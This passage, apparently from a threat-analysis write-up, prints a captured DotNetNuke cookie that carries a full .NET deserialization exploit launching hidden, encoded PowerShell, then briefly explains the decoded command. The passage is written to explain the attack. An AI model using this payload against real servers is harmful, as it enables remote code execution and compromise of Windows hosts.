EFCVEFIa0Fjd0IwQUdVQWJRQXpBRElBWEFCWEFHa0FiZ0JrQUc4QWR3QnpBRkFBYndCM0FHVUFjZ0JUQUdnQVpRQnNBR3dBWEFCMkFERUFMZ0F3QUZ3QWNBQnZBSGNBWlFCeUFITUFhQUJsQUd3QWJBQXVBR1VBZUFCbEFDQUFMUUJYQUdrQWJnQmtBRzhBZHdCVEFIUUFlUUJzQUdVQUlBQklBR2tBWkFCa0FHVUFiZ0FnQUNjQUxRQmxBRzRBWXdCdkFHUUFaUUFuQUN3QUlBQWtBR1VBSUFBZ0FDQUEGBwAAABtDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==</anyType> </MethodParameters> </ProjectedProperty0> </ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>;

 

Request Headers:

{"Cookie":"DNNPersonalization=<profile><item key=\"key\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\"ObjectStateFormatter\" xmlns:p3=\"http://www.w3.org/2001/XMLSchema-instance\" /> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:q1=\"http://www.w3.org/2001/XMLSchema\" p5:type=\"q1:string\" xmlns:p5=\"http://www.w3.org/2001/XMLSchema-instance\">/wEy8ykAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAoRgvYyBDOlxXaW5kb3dzXFN5c3RlbTMyXFdpbmRvd3NQb3dlclNoZWxsXHYxLjBccG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtZW5jb2RlIEpBQmxBRDBBSndCTEFFRUFRUUJ0QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVrQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUVBYVFCQkFFTUFNQUJCQUZvQVp3QkJBR2NBUVFCREFHTUFRUUJhQUZFQVFnQnFBRUVBU0FCUkFFRUFTZ0IzQUVFQWN3QkJBRU1BWXdCQkFGUUFad0JDQUd3QVFRQklBR01BUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdFQVp3QkJBRzRBUVFCREFIY0FRUUJLQUhjQVFRQjBBRUVBUlFBNEFFRUFXUUJuQUVFQWJnQkJBRU1BYXdCQkFFc0FVUUJCQUdjQVFRQkRBR2NBUVFCSkFHY0FRZ0EzQUVFQVJBQkZBRUVBWmdCUkFFSUFOd0JCQUVRQVNRQkJBR1lBVVFCQ0FEY0FRUUJFQUUwQVFRQm1BRkVBUWdBM0FFRUFSQUJSQUVFQVpnQlJBRUlBTndCQkFFUUFRUUJCQUdZQVVRQkJBR2tBUVFCREFEQUFRUUJhQUdjQVFRQm5BRUVBUXdCakFFRUFZZ0JuQUVJQU1BQkJBRU1BWXdCQkFFd0FRUUJCQUc0QVFRQkdBRTBBUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdRQVFRQkNBR3dBUVFCREFHTUFRUUJNQUVFQVFRQnVBRUVBU0FCckFFRUFZd0IzQUVFQWJnQkJBRU1BYXdCQkFFd0FRUUJCQUc4QVFRQkRBRWtBUVFCbEFIY0FRUUIzQUVFQVNBQXdBRUVBWlFCM0FFRUFlUUJCQUVnQU1BQkJBR1VBZHdCQkFIZ0FRUUJJQURBQVFRQkpBR2NBUVFCMEFFRUFSd0JaQUVFQVNnQjNBRUlBZEFCQkFFTUFZd0JCQUV3QVFRQkJBRzRBUVFCSEFGVUFRUUJaQUdjQVFnQkVBRUVBUndCM0FFRUFZUUJSQUVFQWJnQkJBRU1BZHdCQkFFb0Fkd0JCQUhVQVFRQkZBRFFBUVFCYUFGRUFRZ0F3QUVFQVF3QTBBRUVBVmdCM0FFRUFiZ0JCQUVNQWF3QkJBRXdBUVFCQkFHNEFRUUJIQUZVQVFRQktBSGNBUVFCd0FFRUFRd0JyQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjZBRUVBU0FBd0FFRUFaUUIzQUVFQWVRQkJBRWdBTUFCQkFHVUFkd0JCQUhjQVFRQklBREFBUVFCSkFHY0FRUUJuQUVFQVF3QXdBRUVBV2dCbkFFRUFad0JCQUVNQVp3QkJBRWtBWndCQ0FEY0FRUUJFQUVVQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUlBTndCQkFFUUFTUUJCQUdZQVVRQkJBR2tBUVFCREFFRUFRUUJNQUZFQVFnQnRBRUVBUXdCakFFRUFaQUJCQUVJQWVRQkJBRWNBYXdCQkFFb0Fkd0JCQUhNQVFRQkRBR01BUVFCWkFGRUFRZ0JyQUVFQVJnQk5BRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBR0lBWndCQ0FHNEFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVVnQkJBRUVBYmdCQkFFTUFkd0JCQUVzQVFRQkJBR2tBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBU0FCekFFRUFUUUJCQUVJQU9RQkJBRU1BU1FCQkFFa0FRUUJCQUhRQVFRQkhBRmtBUVFCS0FIY0FRZ0IxQUVFQVJ3QjNBRUVBWWdCM0FFRUFiZ0JCQUVNQWR3QkJBRW9BZHdCQ0FETUFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVlnQjNBRUVBYmdCQkFFTUFhd0JCQUV3QVp3QkJBR2tBUVFCSEFHc0FRUUJaQUVFQVFnQlBBRUVBUmdCWkFFRUFWQUIzQUVJQVp3QkJBRVVBY3dCQkFGb0FVUUJCQUdrQVFRQkRBR2NBUVFCTEFFRUFRUUJwQUVFQVNBQnpBRUVBVFFCQkFFSUFPUUJCQUVnQWN3QkJBRTRBUVFCQ0FEa0FRUUJJQUhNQVFRQk5BSGNBUWdBNUFFRUFTQUJ6QUVFQVRRQm5BRUlBT1FCQkFFZ0Fjd0JCQUU0QVVRQkNBRGtBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBUXdCSkFFRUFUQUJSQUVJQWJRQkJBRU1BUVFCQkFFc0FRUUJCQUdrQVFRQklBSE1BUVFCTkFFRUFRZ0E1QUVFQVNBQnpBRUVBVFFCUkFFSUFPUUJCQUVNQVNRQkJBRWtBUVFCQkFIUUFRUUJIQUZrQVFRQktBSGNBUWdCdkFFRUFTQUJSQUVFQVpBQkJBRUVBYmdCQkFFTUFkd0JCQUVvQWR3QkNBSGNBUVFCRUFHOEFRUUJLQUhjQVFRQndBRUVBUXdCM0FFRUFTZ0IzQUVJQWR3QkJBRWdBVFFCQkFFMEFVUUJCQUc0QVFRQkRBSGNBUVFCS0FIY0FRUUF6QUVFQVJ3QnZBRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBRm9BVVFCQ0FIUUFRUUJIQUZVQVFRQktBSGNBUVFCekFFRUFRd0JuQUVFQVNRQm5BRUlBTndCQkFFUUFRUUJCQUdZQVVRQkNBRGNBUVFCRUFFVUFRUUJtQUZFQVFRQnBBRUVBUXdBd0FFRUFXZ0JuQUVFQWJnQkJBRU1BT0FCQkFFd0Fkd0JDQURNQVFRQklBR01BUVFCa0FIY0FRUUIxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVjQVZRQkJBRW9BZHdCQkFIQUFRUUJEQUhjQVFRQkxBRUVBUVFCcEFFRUFTQUJ6QUVFQVRRQkJBRUlBT1FCQkFFZ0Fjd0JCQUUwQVVRQkNBRGtBUVFCREFFa0FRUUJNQUZFQVFnQnRBRUVBUXdCQkFFRUFTZ0IzQUVFQWRRQkJBRWdBWXdCQkFHRUFVUUJDQUhVQVFRQkRBRGdBUVFCakFIY0FRZ0JxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVnQVdRQkJBRXdBWndCQkFHNEFRUUJEQUdzQVFRQkxBRkVBUVFCd0FFRUFTQUIzQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjNBRUVBU0FBd0FFRUFTUUJuQUVFQWRBQkJBRWNBV1FCQkFFb0Fkd0JDQUd3QVFRQklBR2NBUVFCS0FIY0FRUUJ6QUVFQVF3QmpBRUVBWVFCUkFFRUFiZ0JCQUVNQWF3QkJBQ2NBT3dBZ0FITUFkQUJoQUhJQWRBQWdBRU1BT2dCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BWEFCVEFIa0Fjd0IwQUdVQWJRQXpBRElBWEFCWEFHa0FiZ0JrQUc4QWR3QnpBRkFBYndCM0FHVUFjZ0JUQUdnQVpRQnNBR3dBWEFCMkFERUFMZ0F3QUZ3QWNBQnZBSGNBWlFCeUFITUFhQUJsQUd3QWJBQXVBR1VBZUFCbEFDQUFMUUJYQUdrQWJnQmtBRzhBZHdCVEFIUUFlUUJzQUdVQUlBQklBR2tBWkFCa0FHVUFiZ0FnQUNjQUxRQmxBRzRBWXdCdkFHUUFaUUFuQUN3QUlBQWtBR1VBSUFBZ0FDQUEGBwAAABtDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==</anyType> </MethodParameters> </ProjectedProperty0> </ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>;"

 

Second, we decode the encoded message again, and then we find the following pattern is in the message. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden –encode

This exploit tries to compromise Windows systems and calls powershell.exe to execute arbitrary codes. Further, the exploit can’t be detected by the majority of defending systems, at the time of writing.